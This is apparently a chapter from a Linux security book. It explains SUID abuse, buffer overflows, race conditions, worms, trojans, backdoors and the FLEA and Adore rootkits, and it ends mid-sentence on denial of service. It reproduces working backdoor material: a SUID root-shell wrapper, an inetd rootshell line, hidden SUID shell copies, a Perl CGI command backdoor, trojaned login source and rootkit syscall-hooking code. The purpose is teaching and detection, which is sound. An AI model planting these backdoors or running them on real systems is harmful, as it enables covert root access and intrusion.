Sometimes an ordinary user needs access to parts of the system usually accessible only by root, to change his password or default shell, for example. UNIX systems implement this by using the set user ID (SUID) flag, which causes an executable file to run with the permissions of its owner, not with those of the user invoking it.

One such example is the XFree86 binary, which needs access to probe hardware, a privilege normally granted only to root. By setting the SUID flag on /usr/X11R6/bin/XFree86, regular users can launch X. Closely related to the SUID attribute is SGID (set group ID). The principle is the same, only this time the file executes as the group that owns it. The SGID attribute is commonly used for games that keep a global score file. The game must be able to write to the score file no matter who is playing it, but, at the same time, users should not be allowed to tamper with the scores. SUID and SGID files can be spotted by examining a file's attributes via the ls command, using the -l switch ("long") for more verbose output:

-rws--x--x 1 root bin 1720796 Mar 2 2003 /usr/X11R6/bin/XFree86

-r-xr-sr-x 1 root games 31916 Feb 13 2003 /usr/bin/glines

In the first example, the s in the owner-executable position indicates that the file is SUID, whereas in the second example, the s in the group-executable position indicates that the file is SGID. When a cracker is able to run a binary as root, the opportunity for abuse is high. Races and buffer overflows (both discussed later) are possibilities, as are attacks based on unexpected input or tainted environment variables. In fact, SUID shell scripts are considered so dangerous that Linux refuses to honor the SUID bit on them.

Aside from the potential for abuse in legitimate SUID programs, a cracker who has gained root access may set the SUID flag on a binary as a means of regaining superuser privileges later. Previously, the typical method was to rename a SUID copy of /bin/sh and hide it in a directory such as /tmp. By executing this binary, the user was dropped into a root shell and was able to execute privileged commands. Shells supplied with recent versions of Linux fixed this problem by dropping all SUID/SGID privileges, but an attacker can still create a SUID backdoor by using a small C wrapper program to launch the shell. Compiling the following program and setting the SUID bit causes it to spawn a root shell when executed by an unprivileged user:

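#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

int main(void) {
    setuid(0);             /* succeeds only when the binary is SUID root */
    system("/bin/bash");   /* start a shell under the new user ID */
    return 0;
}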

The Buffer Overflow

The Basics


Linux divides physical memory (RAM) into 4 KB blocks, called pages, each with a unique

number. The first step in executing a program is to load it into memory, so the kernel allocates

one or more pages to the process, keeping track of which page is in use by which program in

an internal table. Paged memory uses relative addressing; all data in the page is referenced

relative to the start of the page. This frees the process from having to worry about its exact

location in memory.

Memory used by the process is divided into three distinct blocks:

Text Region:

This contains instructions and read-only data. There should be no need to modify the data here, so it is marked as read-only, and any attempt to write to it generates a segmentation violation.

Data Region:

Both static and dynamic data is stored here. Its size may be changed, if necessary, and the

data stored here is shared - other processes may freely access it.

Stack Region:

This is used to store dynamic data, such as variables passed between functions. This is the most important region for you to consider.

These three regions are shown in Figure 2.1.


Low Memory

| Text |
| Data |
| Stack |

High Memory

Figure 2.1

The Stack

Stacks are a method of storing data in which newly-added items are placed "on top" of existing items. When you retrieve data from a stack, the most recently-added item is accessed first. The common analogy is that of dinner plates. Imagine that you work in a restaurant's kitchen. When the chef asks for a plate, you take one off the top of the pile; and when a plate has been washed and dried, you place it on the top of the pile. In computer science-speak, you push and pop the plates, and the system is described as First In, Last Out (FILO) or Last In, First Out (LIFO).

A stack's size is dynamic, with the kernel capable of increasing or decreasing its size during

runtime. The bottom of the stack is at a fixed address (usually the end of the page), and a Stack

Pointer (SP) is used to point to the top of the stack. So why are stacks so important to

crackers? All high-level programming languages (such as C/C++, Java, Perl, and Python) use

functions. Some languages refer to them as subroutines or procedures, but they are all

essentially the same thing. A function is an abstract concept, and passing data between

functions is implemented by using a stack. When a function is called, its parameters are pushed

onto the stack in reverse order. Next comes the Return Address (RET) - the address execution

should jump back to after the function has finished - followed by a Frame Pointer (FP), and,

finally, any automatic local variables:

| Local Variables | FP | RET | Parameters |

Figure 2.2: Stack layout during a function call

Let's look at an example:

void test(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
}

int main(void) {
    test(1, 2, 3);
    return 0;
}

Figure 2.3 shows how the stack looks when the function test is called:

| buffer2 | buffer1 | FP | RET | a | b | c |

Figure 2.3: Stack contents when test is called. buffer2 and buffer1 are the local variables for function test; a, b and c are the parameters passed to function test.

On 32-bit machines, a word is 4 bytes, and memory must be addressed in multiples of words.

So buffer1 is allocated 8 bytes, and buffer2 12 bytes.

The Overflow

In the previous example, a fixed amount of storage space has been allocated for the two

character arrays buffer1 and buffer2, but what happens if you attempt to store more data in

them than was initially allocated? Here's another example:

#include <string.h>

void test(char *str) {
    char buffer[10];
    strcpy(buffer, str);   /* deliberately unsafe: no bounds check */
}

int main(void) {
    char *large_string = "AAAAAAAAAAAAAAAAAAAA"; /* 20 bytes long */
    test(large_string);
    return 0;
}

Executing this code causes a segmentation fault (SEG fault). In order to understand why, look

at the contents of the stack when the function test is called:

| Buffer       | FP   | RET  | *str |
| AAAAAAAAAAAA | AAAA | AAAA |      |

Figure 2.4. The buffer overflows, causing RET to be overwritten

12 bytes have been allocated for the buffer (because it must be a multiple of the word size), but

large_string is 20 bytes long. As shown in Figure 2.4, when str is copied into the buffer, the

extra data spills over - in this case, clobbering FP and RET (both 4 bytes wide). The character

A has a hex value of 0x41, meaning the return address is now 0x41414141. When the function

ends, the process attempts to jump to this address, and, because it is out of range, a

segmentation fault is generated. This is a pretty annoying problem - an easy mistake - that

stems from the fact that functions such as strcpy do not perform any boundary-checking. To a

cracker, however, this is a good situation, because it allows him to change the program's flow of

execution. Consider the following program, which reads user input into an array:

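#include <stdio.h>

void function(void) {
    char small[30];
    gets(small);   /* deliberately unsafe: gets() cannot limit the input length (removed from C in C11) */
}

int main(void) {
    function();
    return 0;
}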

With gets() providing no boundary-checking, a user can easily overflow the buffer (whether

intentionally or not), causing the return address to change, and execution to jump to another

area of the process's memory. In some cases, the attacker may use this to bypass certain sections of the program (such as a function that validates an entered password before

continuing), but he would most probably want to spawn a shell. So the next question pertains to

how the attacker may force commands of his choice to be executed. The solution is elegantly

simple: place the commands into the buffer you are overflowing, and overwrite the return


address so that it points back to the beginning of the buffer.

Race Conditions

We tend to think of a program's actions as occurring atomically, i.e., in one unit. In reality, a

finite time-gap exists between each statement being executed. Consider the following Perl

script, which imposes the Bash shell onto /bin/sh users:

open (IN, "< /etc/passwd") || die $!;
chomp (@lines = <IN>);
close IN;

use Fcntl qw(:flock);    # provides LOCK_EX

open (OUT, "> /etc/passwd") || die $!;
flock (OUT, LOCK_EX) or die "Can't lock /etc/passwd: $!";
foreach (@lines) {
    s/\/bin\/sh$/\/bin\/bash/;    # rewrite the login shell in place
    print OUT $_, "\n";
}
close OUT;

In Lines 1-3, /etc/passwd is opened and read into an array, removing the trailing \n from the end

of each line. Having reopened /etc/passwd for writing on Line 7, a foreach loop then iterates

through each line of the array, substituting any occurrences of /bin/sh for /bin/bash, and writing

the output. But what happens if another legitimate process attempts to modify /etc/passwd while

this program is running? Any changes made by the other process will simply be clobbered as

the contents of @lines are written out. This constitutes a race condition: two or more processes

simultaneously accessing the same resource, usually a file, the outcome being dependent on

which process gets there first. This may seem like more of a theoretical risk - the time delay

between two sequential commands being executed is very small - but the problem is

compounded by the Linux kernel's multitasking nature. One of the kernel's jobs is to juggle CPU time between each running process, creating an illusion that they are all running simultaneously. It does this by allocating each process a slice of the CPU time (in fact, they are called timeslices), the size of the slice depending on the priority of the process. After this time has expired, execution switches to the next task. Userland programs have no way of controlling

this, so it is possible that execution may pause in the middle of a sequence of commands such

as:

if (access("/tmp/tempfile", R_OK) == 0) {
    /* execution may be suspended here, between the check and the use */
    fd = open("/tmp/tempfile", O_RDONLY);
    ....

The time during which a race condition such as this may occur is referred to as the window of vulnerability.

Red Hat diskcheck Race

The Red Hat PowerTools Suite (Versions 6.0 - 7.0) contains a program, diskcheck.pl, which checks disk usage on an hourly basis, and notifies the

administrator if the filesystem is becoming full. The generated e-mail is first written to a

temporary file in /tmp named diskusagealert.txt.$$, where $$ represents the pid of the process.

Because an attacker can predict what the temporary filename will be (by looking in the process

list while diskcheck.pl is running), it now becomes possible for him to clobber a file for which he

has no write access, via a symbolic link. For example:

ln -s /etc/passwd /tmp/diskusagealert.txt.22401

Now when diskcheck.pl (which is running as root), attempts to open /tmp/

diskusagealert.txt.22401, it ends up opening /etc/passwd instead, overwriting user account

details in the process. Nobody will be able to log into the system until the administrator repairs

the damage. Race conditions can be difficult to win because of the timing involved - it may be

necessary to run the race several hundred times before achieving success. The most profitable

programs to exploit are typically those running SETUID, because the cracker may launch them

as many times as necessary.

Viruses and Worms

The commonly accepted difference between viruses and worms is that while viruses require

user intervention to spread, such as a user opening a malicious e-mail attachment, worms self-

propagate. Both may or may not contain a payload, but even in the absence of one, the amount

of network traffic generated can still cause considerable damage, especially in the case of

worms.

UNIX in general and Linux in particular have been lucky so far, with few viruses or worms being reported. Some have cited Linux's strong multiuser model as one reason, because it makes it

difficult for viruses to spread. Others have attributed it to the tradition of freely available source

code, allowing any malicious code to be quickly discovered. Many more say that the relatively

low percentage of Linux users (compared to, say, Windows) also indicates that there is little

interest in developing Linux viruses.


One interesting difference between the viruses and worms affecting Linux and those affecting

Windows is the payload. Windows viruses tend to delete files and render the system unusable. In Linux, the trend seems to be towards a payload that benefits the virus's creator, such as

allowing the machine to be used as part of a distributed DoS attack. This is not always the

case, but this behavior has been observed in a large proportion of the viruses seen under

Linux.

The Morris Worm

The world's first major computer worm was launched in November 1988. Written by Robert

Morris, a Cornell University student, the Morris worm exploited known vulnerabilities in

Sendmail and Fingerd and spread quickly across the Internet (which, in 1988, was still made up

of mainly universities and government/military institutions). The worm's first line of attack was to connect to a remote machine's Sendmail server. By invoking debug mode, commands could be

piped directly to the shell - in this case, a small C program that connected back to the attacking

machine - and transferred across the rest of the files. If the Sendmail exploit failed, the worm

used a buffer overflow in the finger daemon to achieve the same result. With the worm now

running on the victim host, the cycle repeated, with a twist: Remote Shell (RSH) and Remote

Execute (REXEC), which use host-based authentication, offered a third way of propagating the

worm. By brute-forcing /etc/passwd (using /usr/dict/words as the wordlist), the worm could

assume the identity of other users, and log into other machines. The Internet was a more

trusting place back then, and the worm, which was released into the wild at MIT in an attempt to

disguise its origin, spread at a rate that alarmed even Morris. A mistake in the code also meant

that the worm could infect the same machine multiple times. The majority of the damage

inflicted was a result of servers grinding to their knees as they attempted to execute multiple

instances of the worm. History has been kind to the naive Robert Morris. Today's virus writers

are generally considered the lowest of the low, and many hackers feel a certain empathy

toward Morris, perhaps seeing a little of their own sense of mischief and curiosity in him.

Certainly Morris' intentions were not malicious - the worm contained no payload; its only

purpose was to replicate and spread. A full analysis of the Morris worm is available at http://www.worm.net.


Key Logging

The best encryption in the world is useless if an attacker can silently log keystrokes typed at the

keyboard. In Linux, keyloggers are available that run either in userspace (as a regular program)

or kernelspace (as a kernel module). Here is lkl in action:

# lkl -m pete@localhost -l -k keymaps/us_km

=

Started to log port 0x60. Keymap is keymaps/us_km. The logfile

is (null).

(o)(2)()(NULL)(')(7)()(t)(i)(n)(y)()(l)(e)

(c)(r)(o)()(t)(r)(o)(n)(c)()(d)(e)(v)(i)(e)(s)()(p)(l)(u)

(g)()(i)(n)(t)(o)()(t)(h)(e)()()()()()

()(s)(i)(t)()(b)(e)(t)(e)(e)()(t)(h)(e)()()({)(s)(/)()()()(?)()(P)()(D)(R)(O)(S)(:)()(P)(@)({)(:)

(I)(H)()(N)()(Y)()(L)(R)(U)(B)(P)(S)(T)(F)(



TROJANS AND BACKDOORS

Viruses and worms propagate to as many hosts as possible, causing intentional damage along

the way. Trojans provide an attacker with a means of remote entry into a system and most do

not self-replicate. Trojans rarely cause any damage because their intention is to remain undiscovered, and may be found in binaries or source code - the former being more likely.

Trojans take their name from the famous Trojan horse of Greek legend, recounted in Homer's Odyssey and Virgil's Aeneid. In computing, the term describes any apparently harmless code that has a hidden feature or payload. A Trojan's typical actions include:

Mailing /etc/shadow to the author

Adding a rootshell to /etc/inetd.conf or /etc/xinetd.d/

Adding a user with root access to /etc/passwd

Hiding files, processes, and network sockets used by the Trojan

Backdoors are generally installed by an attacker who has achieved (root) access and wants to

hold onto it. It is worth noting that much of the functionality of the two overlaps; as in the

previous examples, a Trojan typically installs a backdoor itself. In fact, a Trojan is a backdoor that the system administrator is tricked into executing.

The Sendmail Trojan

The big security story of autumn 2002 was that ftp://ftp.sendmail.org had been cracked, and a

trojan had been planted in the Sendmail 8.12.6 tarball. An estimated 200 users downloading the

source code were affected between 28th September and 6th October (this figure would have been much higher, but the ftpd was reportedly reconfigured so that only 1 in 10 users received the

Trojaned copy). Building the source code caused the backdoor to be compiled and launched.

The backdoor then opened a TCP connection to a fixed remote host, aclue.com, and awaited

instructions.


Modifying /etc/passwd

Perhaps the most common backdoor is the extra root account added to /etc/passwd, and the

presence of one of these - or any other unknown account - should immediately alert a system

administrator. Aside from user accounts, /etc/passwd also contains a lot of system accounts,

and a cunning attacker will attempt to masquerade his backdoor account as one of these.

Consider the following example:

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

printer:x:0:0:printer:/bin/bash

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

Did you spot the erroneous account in this list? The printer account has root-level privileges

(the uid is 0 in the third field), and has /bin/bash as its login shell. Most system accounts use

/sbin/nologin or /sbin/false to prevent users from logging into them. If in doubt, a look through

/etc/shadow should clarify the issue:

root:$1$K31Ojx8J$cqS7sHv2rZp2erEfCp.SW1:12222:0:99999:7:::

bin:*:12177:0:99999:7:::

daemon:*:12177:0:99999:7:::

adm:*:12177:0:99999:7:::

lp:*:12177:0:99999:7:::

sync:*:12177:0:99999:7:::

shutdown:*:12177:0:99999:7:::


halt:*:12177:0:99999:7:::

mail:*:12177:0:99999:7:::

printer:$1$DrKD1mRs$TxPP4rs8Fw1E/oQ5K5e3HO1:12177:0:99999:7:::

news:*:12177:0:99999:7:::

uucp:*:12177:0:99999:7:::

operator:*:12177:0:99999:7:::

games:*:12177:0:99999:7:::

gopher:*:12177:0:99999:7:::

ftp:*:12177:0:99999:7:::

The second field of this file is the shadowed password; a * indicates that the account is disabled, and !! that no password has been set and the account is locked. Something is very wrong here: printer, supposedly a system account, has a real password hash and can therefore be used to log in. An intruder has probably modified entries in these files in order to allow himself privileged access.

Modifying /etc/inetd.conf

Another popular backdoor is the rootshell in /etc/inetd.conf. Inetd is the Internet "super-server",

a daemon responsible for overseeing much of the networking services in Linux. The format of

/etc/inetd.conf is as follows[4]:

For example:

ftp stream tcp nowait root /usr/sbin/tcpd proftpd

#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

pop3 stream tcp nowait root /usr/sbin/tcpd /usr/sbin/popa3d

The cracker types the following line to create a backdoor:

60000 stream tcp nowait root /bin/sh sh -i

Now anybody connecting to TCP port 60000 will be dropped into a rootshell. Remember that

the first argument in inetd.conf entries is simply a descriptive name, and is mapped against

/etc/services. Do not be fooled by:


nntp stream tcp nowait root /bin/sh sh -i

This is a rootshell listening on port 119 (the port usually associated with NNTP), not a legitimate

Network News Transfer Protocol (NNTP) server. It is also possible to launch a second instance

of inetd using a different configuration file, for example:

# inetd /tmp/backdoor_inetd.conf

This method is more noticeable because two instances of inetd now show up in the process table.

Most Linux distributions now include the more powerful xinetd as a replacement for inetd. With xinetd, an attacker may place his backdoor in either /etc/xinetd.conf or the /etc/xinetd.d/ directory.

Many networks employ aggressive filtering of inbound traffic, but very few apply the

same rigorous standards to packets leaving the network. An attacker can easily circumvent

these restrictions by using an outbound rootshell, such as in the Sendmail Trojan. This method

also allows attackers to reach machines with internal addresses, which would otherwise not be

reachable from the Internet.

Creating SUID Shells

In this method, an attacker makes a copy of a shell, and sets the SUID attribute on it:

cp /bin/bash /tmp/.cron_lock

chmod 4755 /tmp/.cron_lock

If the attacker already has a legitimate account on the system, or has added a user-level

account to /etc/passwd (reasoning that a user account is less likely to be noticed by the

administrator than a root account), he can now execute /tmp/.cron_lock to obtain a root bash

shell. The SUID shell does not have to reside in /tmp; indeed, many systems periodically clean

out /tmp. If it is on a separate partition, it may be mounted to disallow SUID files anyway. The

SUID shell can have an inconspicuous name, such as /usr/sbin/kernel_probe or

/usr/local/bin/X11reset.

CGI Abuse

If you are running a publicly-accessible web server, Common Gateway Interface (CGI) scripts


offer another point of re-entry into the system. This can take the form of an attacker creating his

own CGI script, or, better still, modifying an existing script. A backdoor CGI can be as simple

as:

#!/usr/bin/perl

use CGI;

$q = new CGI;

print "Content-type:text/plain\n\n";

system ($q->param("command"));

The attacker can then execute any command on the machine by fetching the URL, for example:

http://example.com/cgi-bin/backdoor.pl?command=ls or

http://127.0.0.1/cgi-bin/backdoor.pl?command=ps%20auxf

Many CGI scripts use Perl modules, and a subtler way of creating a backdoor is to poison one

of them. In the previous example, Line 2 of the script (use CGI;) instructs Perl to source the file CGI.pm (in much the same way as C #include statements). By editing the CGI.pm module, a

backdoor can be created that, aside from being much harder to find, will also be accessible

from the majority of CGI scripts installed on the server.

ROOTKITS

Gaining access to a machine is only half the battle; the attacker needs to ensure that, once in,

the administrator will remain unaware of his presence, and that he may easily log back in at a

later date. Rootkits are specifically designed for this purpose. Basically a collection of small

programs, rootkits speed up and simplify the process. They may typically consist of a log

cleaner (which attempts to remove all traces of the cracker's presence from log files), Trojaned

versions of common shell commands (such as ls, ps, and netstat), and often an SSHD

configured to listen on a non-standard port - this is the attacker's means of re-entry.

Rootkits are divided into two types. The standard type replaces system binaries such as ps and ls with Trojaned versions, modified to hide certain processes or files. Which files and processes to hide are either compiled in or read from an external file. The latter method is preferred

because it allows the cracker to easily alter their behavior. These types of rootkits are not

terribly hard to discover. The big giveaway is the change in size of the Trojaned binaries. By

running strings on them, it is usually possible to see what is being hidden, or the location of a


configuration file. After these binaries have been replaced with clean copies, the search for

backdoors can begin.

The second type of rootkit is the Loadable Kernel Module (LKM). These rootkits are, as the

name suggests, loaded into the Linux kernel as modules. By operating at the kernel level, they

remove the need for any alterations to system binaries. Consequently, techniques used in

discovering standard rootkits are often useless in detecting LKM kits.

Although the use of rootkits is very widespread, many administrators still do not know much

about them. Some of the most popular ones are given below:

FLEA

The FLEA rootkit consists of the following files:

flea/

flea/install

flea/trojs/

flea/trojs/ps.c

flea/trojs/netstat.c

flea/trojs/du.c

flea/trojs/pstree.c

flea/trojs/locate.c

flea/trojs/process.h

flea/trojs/dir.h

flea/trojs/pshid.h

flea/sshd/

flea/sshd/pg

flea/sshd/sshd

flea/sshd/tconf

flea/sshd/leet/

flea/sshd/leet/ssh_host_key

flea/sshd/leet/ssh_host_key.pub

flea/sshd/leet/ssh_random_seed

flea/cleaner

flea/README


FLEA consists of the following trojaned binaries: ps, pstree, netstat, du, and locate. Backdoors

are provided in the form of patched versions of ssh and ulogin.

The install script moves the following files:

/bin/ps to /usr/lib/ldlibps.so,

/bin/netstat to /usr/lib/ldlibns.so,

/usr/bin/pstree to /usr/lib/ldlibpst.so,

/usr/bin/du to /usr/lib/ldlibdu.so,

/usr/bin/slocate to /usr/lib/ldlibct.so

and replaces all of them with Trojaned copies. As mentioned in README, the header files for

the Trojaned binaries need editing to set the processes to be hidden. By default, dir.h defines

the following hidden files/directories:

#define PROC10 "ld"

#define PROC11 ".config"

#define PROC12 "ssh"

#define PROC13 "/dev/..0"

processes.h defines any strings which should be hidden from the output of netstat:

#define ADD6 "ssh"

#define ADD7 "login"

#define ADD8 "teln"

pshid.h defines strings to be hidden from the output of ps:

#define PROCESS "/usr/lib/"

#define PROCESS2 "login"

#define PROCESS3 "ssh"

#define PROCESS4 "teln"

#define PROCESS5 "ftp"

#define PROCESS10 "cesso"

#define PROCESS11 "prot"


#define PROCESS12 "jool"

#define PROCESS18 "ld"

Now back to the installer, where the user is prompted to set a password, and ulogin.c is written

on the fly and compiled. /bin/login is moved to /usr/sbin/login, and replaced with the newly-compiled login executable, the source code for which looks like the following:

ulogin.c:

#define PASSWORD *password here*

#include

#if !defined(PASSWORD)

#if !defined(_PATH_LOGIN)

# define _PATH_LOGIN "/usr/sbin/login"

#endif

main (argc, argv, envp)

int argc;

char **argv, **envp;

{

char *display = getenv("DISPLAY");

if ( display == NULL ) {

execve(_PATH_LOGIN, argv, envp);

perror(_PATH_LOGIN);

exit(1);

}

if (!strcmp(display,PASSWORD)) {

system("/bin/bash");

exit(1);

}

execve(_PATH_LOGIN, argv, envp);

exit(1);

}

The attacker can now get a rootshell by setting the environmental variable DISPLAY to the

password before he attempts to login to the infected machine. It is time to install the SSHD.

After prompting the attacker for a port and password, /lib/security/.config/ssh/ is created to hold

the host key and config file. The pg binary is used to encrypt the entered password, which is


then written to /etc/ld.so.hash. The Trojaned SSHD is then copied over to /usr/bin/ssh2d,

launched in quiet mode (-q), and an entry is added to /etc/rc.d/rc.sysinit to start the daemon on

boot. Finally the rootkit installation directory is removed.

The SSHD binary is worth a second look. Running strings on it brings up some strange results,

notably GET /~telcom69/gov.php HTTP/1.0. A quick online search shows that the file is infected

with RST.b, a virus that infects ELF binaries. An analysis of the virus is available at

http://www.security-focus.com/archive/100/247640.

Once installed, FLEA (along with the other rootkits discussed here) provides the attacker an

opportunity to re-enter the system at a later date, while hiding his actions from the

administrator. To an uninitiated administrator, such rootkits can be very difficult to spot, and

may allow an intruder to remain undetected by, and with full control of, the system for months or

even years.

Adore (2.4.x Kernel)

Adore is a Loadable Kernel Module (LKM) rootkit. Unlike other rootkits, Adore does not need to

replace system binaries such as netstat with its own versions - it intercepts system calls and

modifies them as required. The source distribution contains the following files:

drwxr-xr-x 2 pete users 4096 Jan 3 2002 CVS

-rw-r--r-- 1 pete users 1275 Jan 3 2002 Changelog

-rw-r--r-- 1 pete users 1660 Jun 25 2000 LICENSE

-rw-r--r-- 1 pete users 1016 May 15 2001 Makefile.gen

-rw-r--r-- 1 pete users 3164 May 15 2001 README

-rw-r--r-- 1 pete users 52 Jun 1 2001 TODO

-rw-r--r-- 1 pete users 23665 Jan 3 2002 adore.c

-rw-r--r-- 1 pete users 2796 Dec 5 2001 adore.h

-rw-r--r-- 1 pete users 4212 Feb 26 2001 ava.c

-rw-r--r-- 1 pete users 1979 Dec 23 2000 cleaner.c

-rwxr-xr-x 1 pete users 4181 Jan 3 2002 configure

-rw-r--r-- 1 pete users 1904 Sep 19 2000 dummy.c

-rw-r--r-- 1 pete users 3417 May 13 2001 libinvisible.c

-rw-r--r-- 1 pete users 2527 Dec 21 2000 libinvisible.h

-rw-r--r-- 1 pete users 2191 May 13 2001 rename.c


-rwxr-xr-x 1 pete users 193 Mar 21 2001 startadore

On with the installation:

# ./configure

Starting adore configuration ...

Checking 4 ELITE_UID ... found 30

Checking 4 ELITE_CMD ... using 15621

Adore's Makefile defines an ELITE_CMD, a number (for example, 15621) used as a sort of password. A random number is used, unless explicitly set by the user:

Checking 4 SMP ... NO

Checking 4 MODVERSIONS ... NO

Checking for kgcc ... found cc

Checking 4 insmod ... found /sbin/insmod --- OK

Loaded modules:

ipt_MASQUERADE 1272 2 (autoclean)

iptable_nat 14904 1 (autoclean) [ipt_MASQUERADE]

ip_conntrack 18016 1 (autoclean) [ipt_MASQUERADE iptable_nat]

iptable_filter 1644 1 (autoclean)

ip_tables 11768 5 [ipt_MASQUERADE iptable_nat iptable_filter]

nfsd 67344 8

parport_pc 14724 0

parport 23264 0 [parport_pc]

pcmcia_core 38112 0

ide-scsi 8048 0

3c59x 26736 2

Since Adore's Version 0.33 requires "authentication" for its services, you will be prompted for a

password now, which will be compiled into "adore" and "ava", so you will not need to take any

further action. This procedure will save Adore from scanners. Choose a unique name that will

not clash with normal calls to :

Password (echoed):kermit

Preparing /home/pete/rk/adore (== cwd) for hiding ...


Creating Makefile ...

*** Edit adore.h for the hidden services and redirected

file-access ***

cp: cannot stat 'Makefile': No such file or directory

# make

rm -f adore.o

cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=15621 \
-DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"kermit\" \
adore.c -o adore.o

In file included from adore.c:36:
/usr/src/linux/include/linux/malloc.h:4:2: warning: #warning linux/malloc.h is deprecated, use linux/slab.h instead.

cc -O2 -Wall -DELITE_CMD=15621 -DELITE_UID=30 \
-DCURRENT_ADORE=42 -DADORE_KEY=\"kermit\" ava.c \
libinvisible.c -o ava

cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=15621 \
-DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"kermit\" \
cleaner.c -o cleaner

# ls -l

total 128

drwxr-xr-x 2 pete users 4096 Oct 2 2003 CVS/

-rw-r--r-- 1 pete users 1275 Jan 3 2002 Changelog

-rw-r--r-- 1 pete users 1660 Jun 25 20:03 LICENSE

-rw-r--r-- 1 root root 707 Oct 26 03:03 Makefile

-rw-r--r-- 1 pete users 1016 May 15 2001 Makefile.gen

-rw-r--r-- 1 pete users 3164 May 15 2001 README

-rw-r--r-- 1 pete users 52 Jun 1 2001 TODO

-rw-r--r-- 1 pete users 23665 Jan 3 2002 adore.c

-rw-r--r-- 1 pete users 2796 Dec 5 2001 adore.h

-rw-r--r-- 1 root root 11320 Oct 26 03:03 adore.o

-rwxr-xr-x 1 root root 14771 Oct 26 03:03 ava*

-rw-r--r-- 1 pete users 4212 Feb 26 2001 ava.c

-rw-r--r-- 1 pete users 1979 Dec 23 2000 cleaner.c

-rw-r--r-- 1 root root 860 Oct 26 03:03 cleaner.o

-rwxr-xr-x 1 pete users 4181 Jan 3 2002 configure*


-rw-r--r-- 1 pete users 1904 Sep 19 14:47 dummy.c

-rw-r--r-- 1 pete users 3417 May 13 2001 libinvisible.c

-rw-r--r-- 1 pete users 2527 Dec 21 2000 libinvisible.h

-rw-r--r-- 1 pete users 2191 May 13 2001 rename.c

-rwxr-xr-x 1 pete users 193 Mar 21 2001 startadore*

We now have the ava binary, and two object files: adore.o and cleaner.o. startadore is simply a

shell script that loads the adore module into the kernel:

#!/bin/sh

# Use this script to bootstrap adore!

# It will make adore invisible. You could also

# insmod adore without $0 but then it is visible.

insmod adore.o

insmod cleaner.o

rmmod cleaner

cleaner.c simply removes the last loaded module from the module list.

ava acts as a frontend to

the adore kernel module:

# ./ava

Usage: ./ava {h,u,r,R,i,v,U} [file, PID or dummy (for U)]

h hide file

u unhide file

r execute as root

R remove PID forever

U uninstall adore

i make PID invisible

v make PID visible

But what's to stop the administrator from compiling his own copy of ava, and using it to uninstall

Adore? This is where ADORE_KEY comes in. libinvisible.c (used by ava) defines this function

for authentication:

adore_t *adore_init()


{

adore_t *ret = calloc(1, sizeof(adore_t));

if (mkdir(ADORE_KEY, 0) != 1) {

fprintf(stderr, "Couldn't authorize myself."

" Trying anyway ...\n");

remove(ADORE_KEY);

}

ret->version = close(ELITE_CMD+2);

return ret;

}

It attempts to create a directory with the name of the Adore key. If the return value is 1, the user is authenticated.

This is our first example of how Adore subverts system calls. Switching back to the kernel module shows how this works. First, Adore imports the system call table:

extern void *sys_call_table[];

The REPLACE macro is called:

#define REPLACE(x) o_##x = sys_call_table[__NR_##x]; \

sys_call_table[__NR_##x] = n_##x

REPLACE(mkdir);

Now any call to mkdir causes the n_mkdir function to be executed:

long n_mkdir(const char *path, int mode)

{

char key[64];

long r, l;

if ((l = strnlen_user(path, PATH_MAX)) < sizeof(key)) {

memset(key, 0, sizeof(key));

copy_from_user(key, path, l);

if (strcmp(key, ADORE_KEY) == 0) {

current->flags |= PF_AUTH;


return 1;

}

}

r = o_mkdir(path, mode);

return r;

}

If the directory name passed to mkdir matches the Adore key built into the module, the function returns 1.

Otherwise, call the real mkdir (now renamed o_mkdir), and return its return code. There is

nothing special about the mkdir call. Any syscall could have been sabotaged for the

authentication mechanism, but mkdir has the advantage of not being otherwise used by Adore.

Adore hijacks other system calls in a similar manner, creating a wrapper around the call that

sanitizes the output. Here, the new ptrace function returns the -ESRCH ("No such process")

error if the pid is marked as hidden by Adore. Otherwise, the original ptrace function is called:

int n_ptrace(long request, long pid, long addr, long data)

{

if (is_invisible(pid))

return -ESRCH;

return o_ptrace(request, pid, addr, data);

}

Adore-ng (2.6.x Kernel)

The process of intercepting and sanitizing system calls worked fine in the 2.4.x kernel series,

but the release of the 2.6.x kernel put a stop to that. The syscall table was no longer exported,

so Adore needed another method of operation. Enter Adore-ng, which operated on the VFS

layer. The Virtual FileSystem (VFS) is an abstract layer that provides a uniform interface

between the myriad different filesystems that the kernel supports. Adore-ng replaces existing

handlers for directory listings of the /proc and / (root) filesystems with its own handlers. Because

userland programs such as ps read their information from /proc, this provides an effective way

to hide files and processes.

ATTACKS AGAINST THE NETWORK

Many services in the past, such as Berkeley's R* suite (rlogin, rsh, and so on), relied purely on

the username and IP address of the client as a means of authentication; if your address

appears in another machine's .rhosts file, you can rlogin to that machine without supplying a username and password. From a security point of view, this is not good. Secure Shell (SSH),

Secure Copy (SCP), and Secure File Transfer Protocol (SFTP) provide safer, encrypted

alternatives to Berkeley's R* suite, but some host-based authentication protocols are still

commonly in use - the most common is probably Network File System (NFS). One may argue

that this is a double-sided coin; after all, if no password is transmitted, there is no threat from an

attacker sniffing the connection, and subsequently using the password himself. Despite that, the

move away from host-based authentication to encrypted, password-protected services is

considered by just about everyone to be a good thing.

DENIAL OF SERVICE (DoS)

Denial of Service (DoS) attacks can generally be thought of as any attack that attempts to

deprive legitimate users of a service offered by the system or network by overloading a limited

resource, such as bandwidth, memory, disk space, or CPU time. The most popular DoS attacks

